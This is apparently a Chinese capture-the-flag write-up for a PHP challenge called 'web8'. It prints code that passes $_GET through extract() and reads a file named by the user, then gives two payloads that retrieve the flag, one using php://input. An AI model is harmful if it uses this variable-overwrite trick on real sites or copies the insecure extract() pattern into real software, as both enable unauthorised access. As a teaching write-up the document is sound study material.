web8

简介: web8110txt????http://120.24.86.145:8002/web8/extract() -使用数组键名作为变量名,使用数组键值作为变量值。

web8
110
txt????
http://120.24.86.145:8002/web8/

<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>
  • extract() -使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量.
  • empty()-判断一个变量是否被认为是空的。当一个变量并不存在,或者它的值等同于FALSE,那么它会被认为不存在。如果变量不存在的话,empty()并不会产生警告。
  • trim()-移除字符串两侧的空白字符或其他预定义字符。
  • file_get_contents-将整个文件读入一个字符串

可知,获取flag要使ac不为空,f 的值从文件fn中获取,并且ac===f


姿势1:构造payload:
url:?/ac=aa&&fn=php://input
post data :aa

姿势2 :猜测目录下有txt文件,测试出flag.txt。构造:
?ac=flags&fn=flag.txt

可得出flag


相关文章
|
3月前
|
XML 前端开发 JavaScript
Web的三个主要部分
Web的三个主要部分
544 1
|
6月前
|
移动开发 前端开发 JavaScript
Web2.0时代
Web2.0时代
48 4
|
安全 中间件 PHP
【2021摆烂杯】web
【2021摆烂杯】web
116 0
|
存储 消息中间件 JSON
Web APls-day05
Web APls-day05
|
JavaScript
Web APls-day03
Web APls-day03
|
JavaScript
Web APls-day02
Web APls-day02
|
前端开发 关系型数据库 MySQL
web常见的问题详解
web常见的问题详解
131 0
|
区块链
Web 3.0,究竟是什么?
Web 3.0,究竟是什么?
156 0
|
存储 机器学习/深度学习 人工智能
Web3.0到底是什么?
Web3.0到底是什么?
179 0
|
前端开发 JavaScript
WEB简单回顾
对前端知识的简单回顾